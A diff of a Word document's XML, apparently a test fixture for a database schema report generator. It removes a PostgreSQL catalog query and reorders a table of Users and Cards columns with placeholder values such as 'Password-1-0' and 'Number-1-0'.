-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>CAST(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>c.attlen</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> AS VARCHAR) || '-' || </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    CASE WHEN </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>c.attnotnull</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> THEN '0' ELSE '1' END</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">FROM </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>pg_attribute</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> c</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">JOIN </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>pg_class</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> t ON </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>c.attrelid</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>t.oid</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">JOIN </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>pg_namespace</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> s ON </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>t.relnamespace</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>s.oid</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">JOIN </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>pg_type</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> ty ON </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>c.atttypid</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>ty.oid</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">WHERE </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>c.attnum</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> &gt; 0 </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  AND NOT </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>c.attisdropped</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  AND </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>t.relkind</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = 'r'</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  AND </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>s.nspname</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -4637,7 +4411,206 @@
                     <w:rPr>
                       <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                     </w:rPr>
-                    <w:t>Password</w:t>
+                    <w:t>Password-1-0</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+            </w:tr>
+            <w:tr>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="3148" w:type="dxa"/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:jc w:val="left"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                    <w:t>public-</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                      <w:lang w:val="en-US"/>
+                    </w:rPr>
+                    <w:t>Users</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2409" w:type="dxa"/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:jc w:val="left"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                    <w:t>2001-01-01</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="3233" w:type="dxa"/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:jc w:val="left"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                    <w:t>FirstName-1-0</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+            </w:tr>
+            <w:tr>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="3148" w:type="dxa"/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:jc w:val="left"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                    <w:t>public-</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                      <w:lang w:val="en-US"/>
+                    </w:rPr>
+                    <w:t>Users</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2409" w:type="dxa"/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:jc w:val="left"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                    <w:t>2001-01-01</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="3233" w:type="dxa"/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:jc w:val="left"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                    <w:t>LastName-1-0</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+            </w:tr>
+            <w:tr>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="3148" w:type="dxa"/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:jc w:val="left"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                    <w:t>public-</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                      <w:lang w:val="en-US"/>
+                    </w:rPr>
+                    <w:t>Cards</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2409" w:type="dxa"/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:jc w:val="left"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                    <w:t>2001-01-01</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="3233" w:type="dxa"/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:jc w:val="left"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                      <w:lang w:val="en-US"/>
+                    </w:rPr>
+                    <w:t>Username</w:t>
                   </w:r>
                   <w:r>
                     <w:rPr>
@@ -4671,7 +4644,7 @@
                       <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                       <w:lang w:val="en-US"/>
                     </w:rPr>
-                    <w:t>Users</w:t>
+                    <w:t>Cards</w:t>
                   </w:r>
                 </w:p>
               </w:tc>
@@ -4709,13 +4682,7 @@
                     <w:rPr>
                       <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                     </w:rPr>
-                    <w:t>FirstName</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>-1-0</w:t>
+                    <w:t>Number-1-0</w:t>
                   </w:r>
                 </w:p>
               </w:tc>
@@ -4743,7 +4710,7 @@
                       <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                       <w:lang w:val="en-US"/>
                     </w:rPr>
-                    <w:t>Users</w:t>
+                    <w:t>Cards</w:t>
                   </w:r>
                 </w:p>
               </w:tc>
@@ -4781,13 +4748,7 @@
                     <w:rPr>
                       <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                     </w:rPr>
-                    <w:t>LastName</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>-1-0</w:t>
+                    <w:t>Code-4-0</w:t>
                   </w:r>
                 </w:p>
               </w:tc>
@@ -4852,15 +4813,8 @@
                   <w:r>
                     <w:rPr>
                       <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                      <w:lang w:val="en-US"/>
-                    </w:rPr>
-                    <w:t>Username</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>-1-0</w:t>
+                    </w:rPr>
+                    <w:t>ExpiryDate-4-0</w:t>
                   </w:r>
                 </w:p>
               </w:tc>
@@ -4926,229 +4880,7 @@
                     <w:rPr>
                       <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                     </w:rPr>
-                    <w:t>Number</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>-1-0</w:t>
-                  </w:r>
-                </w:p>
-              </w:tc>
-            </w:tr>
-            <w:tr>
-              <w:tc>
-                <w:tcPr>
-                  <w:tcW w:w="3148" w:type="dxa"/>
-                </w:tcPr>
-                <w:p>
-                  <w:pPr>
-                    <w:jc w:val="left"/>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                  </w:pPr>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>public-</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                      <w:lang w:val="en-US"/>
-                    </w:rPr>
-                    <w:t>Cards</w:t>
-                  </w:r>
-                </w:p>
-              </w:tc>
-              <w:tc>
-                <w:tcPr>
-                  <w:tcW w:w="2409" w:type="dxa"/>
-                </w:tcPr>
-                <w:p>
-                  <w:pPr>
-                    <w:jc w:val="left"/>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                  </w:pPr>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>2001-01-01</w:t>
-                  </w:r>
-                </w:p>
-              </w:tc>
-              <w:tc>
-                <w:tcPr>
-                  <w:tcW w:w="3233" w:type="dxa"/>
-                </w:tcPr>
-                <w:p>
-                  <w:pPr>
-                    <w:jc w:val="left"/>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                  </w:pPr>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>Code</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>-4-0</w:t>
-                  </w:r>
-                </w:p>
-              </w:tc>
-            </w:tr>
-            <w:tr>
-              <w:tc>
-                <w:tcPr>
-                  <w:tcW w:w="3148" w:type="dxa"/>
-                </w:tcPr>
-                <w:p>
-                  <w:pPr>
-                    <w:jc w:val="left"/>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                  </w:pPr>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>public-</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                      <w:lang w:val="en-US"/>
-                    </w:rPr>
-                    <w:t>Cards</w:t>
-                  </w:r>
-                </w:p>
-              </w:tc>
-              <w:tc>
-                <w:tcPr>
-                  <w:tcW w:w="2409" w:type="dxa"/>
-                </w:tcPr>
-                <w:p>
-                  <w:pPr>
-                    <w:jc w:val="left"/>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                  </w:pPr>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>2001-01-01</w:t>
-                  </w:r>
-                </w:p>
-              </w:tc>
-              <w:tc>
-                <w:tcPr>
-                  <w:tcW w:w="3233" w:type="dxa"/>
-                </w:tcPr>
-                <w:p>
